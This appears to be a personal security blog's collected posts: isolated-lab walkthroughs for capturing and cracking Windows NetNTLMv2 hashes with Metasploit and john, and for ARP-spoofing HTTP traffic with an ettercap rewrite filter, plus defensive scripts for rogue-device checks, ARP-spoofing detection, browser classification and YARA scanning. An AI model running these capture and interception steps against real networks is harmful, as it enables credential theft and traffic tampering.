create 2 vms in virtualbox
1.) kali linux ATTACKER
will be used to run ettercap and perform man-in-the-middle
2.) windows VICTIM
will be the victim trying to access the web server
steps
-------
1.) set up the VirtualBox Network tab of both VMs to use "Internal Network" with the same network name
2.) power up both
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux ATTACKER to a similar ip address as windows
    ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) ping each other from within each virtual machine to ensure connectivity
6.) on kali linux ATTACKER system start the metasploit smb capture module
    > msfconsole
    msf> use auxiliary/server/capture/smb
    msf> set CAINPWFILE /tmp/cain.pw1
    msf> set JOHNPWFILE /tmp/john.txt
    msf> exploit
7.) on windows VICTIM system open windows explorer and try to connect to the attacker box
    \\169.254.18.2\
    windows will pop up an authentication prompt, enter a user & password (e.g. guy, password)
8.) on kali linux ATTACKER system metasploit should inform you it captured a hash and saved it to /tmp/john.txt (the file name gets a suffix for the hash type, e.g. /tmp/john.txt_netntlmv2)
    type exit to exit metasploit
    run john against the newly captured file
    > john /tmp/john.txt_netntlmv2 --wordlist /usr/share/wordlists/rockyou.txt
    if it's a weak password (like 'password') john should crack it quickly and display it on the screen
Friday, December 27, 2019
metasploit smb capture password hashes
compare dhcp leases to active directory pcs
python script
# 1st get a list of all dhcp leased unique hostnames (from dhcp logs) and put into dhcp.csv
# 2nd get a list of all active directory computers and save it in ad.csv by running this powershell
# Get-ADComputer -Filter * |select name > ad.csv
# (note: that redirect also writes a "name" header and a "----" underline, and Windows
#  PowerShell 5 writes the file as UTF-16; neither line will ever match a DHCP hostname,
#  but a UTF-16 file must be opened with encoding='utf-16' or nothing will match)
# then run this python to compare and find the potentially rogue devices
adFile = r'ad.csv'
dhcpFile = r'dhcp.csv'
noADfile = r'notInAD.csv'

# read the AD computer names once, lower-cased, instead of re-reading ad.csv for every lease
with open(adFile, 'r') as adFileHandle:
    adHosts = set(adHost.lower().strip() for adHost in adFileHandle if adHost.strip())

notInADCount = 0
searchedCount = 0
with open(dhcpFile, 'r') as dhcpFileHandle, open(noADfile, 'w') as notInADHandle:
    for dhcpHost in dhcpFileHandle:
        dhcpHost = dhcpHost.lower().strip()
        if not dhcpHost:
            continue
        searchedCount = searchedCount + 1
        if dhcpHost not in adHosts:
            # one hostname per line in notInAD.csv
            print(dhcpHost, file=notInADHandle)
            notInADCount = notInADCount + 1
print("%s not in Active Directory, Searched %s DHCP Leases" % (str(notInADCount), str(searchedCount)))
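Added example (my code, not the script from the post): the same comparison with the normalization a real DHCP-vs-AD run needs. DHCP leases often carry the FQDN while AD's name property is the short name, AD exports sometimes carry the trailing "$", and the PowerShell redirect adds a "name" header and a "----" underline. The sample ad.csv and dhcp.csv contents are constructed, not real hosts.

```python
"""Compare DHCP lease hostnames against AD computer names (added example)."""
from typing import Iterable, List, Set


def normalize_hostname(raw: str) -> str:
    """Reduce a hostname to its lower-case short name.

    'PC01.corp.example' and 'PC01$' both become 'pc01', so a lease recorded
    as an FQDN still matches the AD computer object.
    """
    name = raw.strip().lower().rstrip("$")
    return name.split(".", 1)[0]


def load_names(lines: Iterable[str]) -> Set[str]:
    """Build the comparison set, dropping blanks and PowerShell table noise.

    `Get-ADComputer -Filter * | select name > ad.csv` writes a 'name' header
    and a '----' underline before the data; both are skipped here.
    """
    names: Set[str] = set()
    for line in lines:
        stripped = line.strip().lower()
        if not stripped or stripped == "name" or set(stripped) == {"-"}:
            continue
        names.add(normalize_hostname(stripped))
    return names


def find_rogue_hosts(dhcp_lines: Iterable[str], ad_lines: Iterable[str]) -> List[str]:
    """Return DHCP hostnames with no matching AD computer object, sorted."""
    return sorted(load_names(dhcp_lines) - load_names(ad_lines))


# Constructed sample data; ad.csv mimics what the PowerShell redirect writes
SAMPLE_AD_CSV = """
name
----
PC01
PC02
FILESRV01
"""

SAMPLE_DHCP_CSV = """pc01.corp.example
PC02
printer-lobby
FILESRV01.corp.example
raspberrypi
"""

if __name__ == "__main__":
    rogue = find_rogue_hosts(SAMPLE_DHCP_CSV.splitlines(), SAMPLE_AD_CSV.splitlines())
    for host in rogue:
        print(host, "not in Active Directory")
    print("%d not in Active Directory" % len(rogue))
```

A hit here only means "no computer object with that name", so printers, phones and BYOD devices will show up alongside anything genuinely rogue; the list is a starting point for triage, not a verdict.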
ettercap http replace man-in-the-middle full example
create 3 vms in virtualbox
1.) kali linux ATTACKER
will be used to run ettercap and perform man-in-the-middle
2.) kali linux WEB SERVER
will be hosting the website the victim wants to access
3.) windows VICTIM
will be the victim trying to access the web server
steps
-------
1.) setup all 3 virtualbox Network tab to use "Internal Network" and the same name
2.) power up all 3
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux WEB SERVER to similar ip address as windows
ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) configure kali linux ATTACKER to similar ip address as windows
ifconfig eth0 169.254.18.3 netmask 255.255.0.0 up
6.) ping each other system from within each virtual machine to ensure connectivity
7.) on kali linux WEB SERVER create an index.html file that simply says "hello world this is fun exciting stuff"
    then launch python simple http server on port 8001
    python -m SimpleHTTPServer 8001
    (that module is Python 2; with Python 3 the equivalent is: python3 -m http.server 8001)
8.) on windows VICTIM open microsoft edge and navigate to website
http://169.254.18.2:8001/
you will see the text
"this is fun"
9.) on kali linux ATTACKER
create an ettercap filter file with a text editor with this content and save as "fun.filter"
    if (ip.proto == TCP) {
        if (tcp.dst == 8001 || tcp.src == 8001) {
            if (search(DATA.data, "Accept-Encoding")) {
                replace("Accept-Encoding", "Accept-Nothing!");
                msg("removed encoding");
            }
            if (search(DATA.data, "fun")) {
                replace("fun", "evil");
                msg("fun is now evil");
            }
        }
    }
NOTE: the Accept-Encoding replacement above matters: without it the server sends the html gzip encoded rather than as clear text, so the "fun" replace never matches. Matching on both the src and dst port matters too, so the filter sees the request (where Accept-Encoding is) as well as the response (where "fun" is).
next compile the filter
    etterfilter fun.filter -o fun.ef
next run ettercap using the filter and arp spoofing
    ettercap -tq -M arp:remote -F fun.ef /169.254.18.1-3// /169.254.18.1-3//
10.) on windows VICTIM
reload the website
http://169.254.18.2:8001/
you will now see the text
"this is evil"
11.) on kali linux ATTACKER hit the "q" key to remove the arp poisoning and exit
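Added example (my code, not part of the post): what the arp:remote step above looks like from the victim network's side, and how to spot it. During the poisoning one MAC (the attacker's) starts answering for both the victim and the web server, and each of those IPs flips from its real MAC to the attacker's. The observations below are constructed to mirror the lab (.1 victim, .2 web server, .3 attacker); in practice they would come from a packet capture or from polling the ARP table.

```python
"""Detect ARP cache poisoning from observed ARP replies (added example)."""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# (sender_ip, sender_mac) pairs as seen in ARP replies on the segment, in
# arrival order. Constructed: .1 victim, .2 web server, .3 attacker (...:cc)
SAMPLE_ARP_REPLIES = [
    ("169.254.18.1", "08:00:27:aa:aa:aa"),
    ("169.254.18.2", "08:00:27:bb:bb:bb"),
    ("169.254.18.3", "08:00:27:cc:cc:cc"),
    # poisoning starts: the attacker's MAC now answers for both hosts
    ("169.254.18.1", "08:00:27:cc:cc:cc"),
    ("169.254.18.2", "08:00:27:cc:cc:cc"),
    ("169.254.18.1", "08:00:27:cc:cc:cc"),
]


def detect_arp_spoofing(replies: List[Tuple[str, str]]):
    """Return (ip_changes, shared_macs).

    ip_changes:  ip -> ordered list of MACs it was bound to, for IPs whose
                 MAC changed during the observation window
    shared_macs: mac -> set of IPs it claimed, for MACs claiming more than
                 one IP (the arp:remote signature: one MAC for two victims)
    The first binding seen per IP is taken as the baseline. A multi-homed
    host or a router can legitimately own several IPs, so shared_macs is a
    lead to check, while ip_changes on a static lab segment is a red flag.
    """
    bindings: Dict[str, List[str]] = defaultdict(list)
    ips_per_mac: Dict[str, Set[str]] = defaultdict(set)
    for ip, mac in replies:
        mac = mac.lower()
        ips_per_mac[mac].add(ip)
        if not bindings[ip] or bindings[ip][-1] != mac:
            bindings[ip].append(mac)
    ip_changes = {ip: macs for ip, macs in bindings.items() if len(macs) > 1}
    shared_macs = {mac: ips for mac, ips in ips_per_mac.items() if len(ips) > 1}
    return ip_changes, shared_macs


if __name__ == "__main__":
    changes, shared = detect_arp_spoofing(SAMPLE_ARP_REPLIES)
    for ip, macs in changes.items():
        print("ALERT %s moved %s" % (ip, " -> ".join(macs)))
    for mac, ips in shared.items():
        print("ALERT %s claims %s" % (mac, ", ".join(sorted(ips))))
```

On a real network the same two checks are what DHCP snooping plus dynamic ARP inspection enforce on the switch, and a static ARP entry for the gateway on the victim is the cheap host-side fix.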
Monday, December 23, 2019
update datetime on linux
# ntpdate 2.us.pool.ntp.org
syncs with internet time
navigator DOM keys
document.write("navigator.appName = " + navigator.appName + "<br/>");
document.write("navigator.appCodeName = " + navigator.appCodeName + "<br/>");
document.write("navigator.appVersion = " + navigator.appVersion + "<br/>");
document.write("navigator.platform = " + navigator.platform + "<br/>");
document.write("navigator.vendor = " + navigator.vendor + "<br/>");
document.write("navigator.vendorSub = " + navigator.vendorSub + "<br/>");
document.write("navigator.buildID = " + navigator.buildID + "<br/>");
document.write("navigator.oscpu = " + navigator.oscpu + "<br/>");
document.write("navigator.product = " + navigator.product + "<br/>");
document.write("navigator.productSub = " + navigator.productSub + "<br/>");
-----------------
sample output
-----------------
Google Chrome on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
navigator.platform = Win32
navigator.vendor = Google Inc.
navigator.vendorSub =
navigator.buildID = undefined
navigator.oscpu = undefined
navigator.product = Gecko
navigator.productSub = 20030107
-----------------
Internet Explorer on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0; rv:11.0) like Gecko
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub = undefined
-----------------
Microsoft Edge on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub =
-----------------
FireFox ESR on 64bit Kali Linux
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (X11)
navigator.platform = Linux x86_64
navigator.vendor =
navigator.vendorSub =
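Added example (my code, not from the post): what the sample output above actually lets you conclude, written as a server-side Python check of the kind you would run over values a page reports back. All four browsers report appName "Netscape" and appCodeName "Mozilla", so the only distinguishing tokens are in appVersion, plus vendor for Chrome; and because EdgeHTML's appVersion also contains "Chrome/" the order of the tests matters. SAMPLES is copied from the outputs above; SPOOFED is constructed. Every one of these values is script-settable, so treat the result as telemetry, never as identity.

```python
"""Classify a browser from its navigator values (added example)."""
from typing import Dict, List


def classify_navigator(nav: Dict[str, str]) -> Dict[str, object]:
    """Return the browser family plus any cross-field inconsistencies.

    Most specific token first: EdgeHTML's appVersion contains "Chrome/" and
    IE 11's contains "like Gecko", so testing "Chrome/" first would misfile Edge.
    """
    app_version = nav.get("appVersion") or ""
    vendor = nav.get("vendor") or ""
    if "Edge/" in app_version:
        family = "Edge (EdgeHTML)"
    elif "Trident/" in app_version:
        family = "Internet Explorer"
    elif "Chrome/" in app_version:
        family = "Chrome"
    else:
        # Firefox reports just "5.0 (X11)": no engine token to key on
        family = "Unknown"

    notes: List[str] = []
    # Chrome is the only sampled browser that sets vendor; a Chrome-looking
    # appVersion with an empty vendor (or the reverse) points at a tampered value
    if family == "Chrome" and vendor != "Google Inc.":
        notes.append("appVersion claims Chrome but vendor is %r" % vendor)
    if family != "Chrome" and vendor == "Google Inc.":
        notes.append("vendor is Google Inc. but appVersion does not look like Chrome")
    if nav.get("appName") not in (None, "Netscape"):
        notes.append("appName %r differs from every sampled browser" % nav.get("appName"))
    return {"family": family, "consistent": not notes, "notes": notes}


# The four sample outputs from the post, reduced to the fields used here
SAMPLES = {
    "chrome": {"appName": "Netscape", "vendor": "Google Inc.",
               "appVersion": "5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"},
    "ie": {"appName": "Netscape", "vendor": "",
           "appVersion": "5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0; rv:11.0) like Gecko"},
    "edge": {"appName": "Netscape", "vendor": "",
             "appVersion": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763"},
    "firefox": {"appName": "Netscape", "vendor": "", "appVersion": "5.0 (X11)"},
}
# Constructed: Chrome's appVersion reported by a browser that leaves vendor empty
SPOOFED = {"appName": "Netscape", "vendor": "", "appVersion": SAMPLES["chrome"]["appVersion"]}

if __name__ == "__main__":
    for label, nav in list(SAMPLES.items()) + [("spoofed", SPOOFED)]:
        print(label, classify_navigator(nav))
```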
Friday, December 20, 2019
Virtual Box local contained lab, VM to VM
network for both kali & windows
"internal network"
on kali type
ifconfig eth0 169.254.18.XXX netmask 255.255.0.0 up
on kali
ping windows
on windows
ping kali
Thursday, December 5, 2019
yaraOneLiner.py
# Run Yara Rules against a file ONE LINE AT A TIME instead of against the whole file
import os
import subprocess
import argparse

yaraParams = "-s"
tempFileName = "yaraOneLiner.tmp"
lineNumber = 1

arguments = argparse.ArgumentParser("yaraOneLine.py -e yara64.exe -f input.csv -r rule.yar")
arguments.add_argument("-e", "--yaraExe", type=str, required=True, help="Yara executable to use")
arguments.add_argument("-f", "--inputFileName", type=str, required=True, help="Input file to yara scan")
arguments.add_argument("-r", "--yaraRuleFile", type=str, required=True, help="Yara rule file to scan against")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-s", "--status", action="store_true", required=False, help="Enable status tracking for large files")
settings = arguments.parse_args()

with open(settings.inputFileName, "r") as lines:
    for line in lines:
        line = line.rstrip()
        if settings.debug:
            print("\r\n---\r\nLINE %s: %s" % (str(lineNumber), line))
        if settings.status and (lineNumber % 50) == 0:
            print("STATUS: processing line %s" % (str(lineNumber)))
        # write just this one line to the temp file so yara only sees that line
        with open(tempFileName, "w") as tempfile:
            tempfile.write(line)
        # argument list rather than shell=True: paths with spaces or shell
        # metacharacters are passed through untouched
        yaraCommand = [settings.yaraExe, yaraParams, settings.yaraRuleFile, tempFileName]
        output = ""
        try:
            if settings.debug:
                print("ABOUT TO RUN: %s" % " ".join(yaraCommand))
                input("press enter to run yara")
            # decode here so the output is text, not a bytes object
            output = subprocess.check_output(yaraCommand).decode("utf-8", errors="replace")
            if settings.debug:
                print("OUTPUT: %s" % output)
        except Exception as e:
            print("COMMAND: %s" % " ".join(yaraCommand))
            print("ERROR: %s" % str(e))
            output = ""
        if not output.strip():
            if settings.debug:
                print("MATCHES: 0 (no output)")
        elif tempFileName in output:
            # yara prints "rule_name filename" per matching rule, then (with -s)
            # one "0xOFFSET:$id: data" row per matched string
            if settings.debug:
                print("MATCHES: 1+")
            print("MATCH LINE NUMBER %s:" % str(lineNumber))
            print("  LINE: %s" % line)
            print("  YARA:")
            for row in output.splitlines():
                print("    %s" % row)
        else:
            print("MATCHES: 0 (with output)")
        lineNumber = lineNumber + 1

# tidy up the scratch file
if os.path.exists(tempFileName):
    os.remove(tempFileName)
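Added example (my code, not the script above): the script scans one line at a time because plain yara output has no line numbers, only byte offsets. The alternative is to scan the whole file once and convert the offsets that "yara -s" prints ("rule_name filename" followed by "0xOFFSET:$id: matched data" rows) back into line numbers afterwards, which avoids one yara process per line. The scanned file and the yara output below are constructed to match each other; nothing here runs yara itself.

```python
"""Map `yara -s` string-match offsets back to line numbers (added example)."""
import bisect
import re
from typing import List, Optional, Tuple

# One string-match row as printed by `yara -s`:  0x17:$ps: powershell
MATCH_LINE = re.compile(r"^0x([0-9a-fA-F]+):(\$\w*):\s?(.*)$")


def line_start_offsets(data: bytes) -> List[int]:
    """Byte offset at which each line begins; index i holds line i+1."""
    starts = [0]
    for i, b in enumerate(data):
        if b == 0x0A and i + 1 < len(data):
            starts.append(i + 1)
    return starts


def offset_to_line(starts: List[int], offset: int) -> int:
    """1-based line number that contains byte offset `offset`."""
    return bisect.bisect_right(starts, offset)


def parse_yara_s_output(text: str) -> List[Tuple[Optional[str], int, str, str]]:
    """Parse `yara -s` stdout into (rule, offset, string_id, matched_text).

    Rows that do not look like a string match are "rule_name filename"
    headers and set the rule for the rows that follow.
    """
    results = []
    rule: Optional[str] = None
    for raw in text.splitlines():
        m = MATCH_LINE.match(raw)
        if m:
            results.append((rule, int(m.group(1), 16), m.group(2), m.group(3)))
        elif raw.strip():
            rule = raw.split()[0]
    return results


def matches_with_lines(data: bytes, yara_stdout: str) -> List[Tuple[Optional[str], int, str, str]]:
    """Same tuples as parse_yara_s_output, with the offset replaced by a line number."""
    starts = line_start_offsets(data)
    return [(rule, offset_to_line(starts, off), sid, txt)
            for rule, off, sid, txt in parse_yara_s_output(yara_stdout)]


# Constructed sample: the file that was scanned, and what `yara -s` printed for it
SAMPLE_FILE = b"benign line\nsuspicious powershell -enc AAAA\nanother line\nmore powershell here\n"
SAMPLE_YARA_OUTPUT = "suspicious_ps input.csv\n0x17:$ps: powershell\n0x3e:$ps: powershell\n"

if __name__ == "__main__":
    for rule, line_no, sid, txt in matches_with_lines(SAMPLE_FILE, SAMPLE_YARA_OUTPUT):
        print("MATCH LINE NUMBER %d: rule %s string %s = %r" % (line_no, rule, sid, txt))
```

Offsets must be computed on the bytes yara saw, so open the file in binary mode; reading it as text on Windows would translate CRLF and shift every offset after the first line.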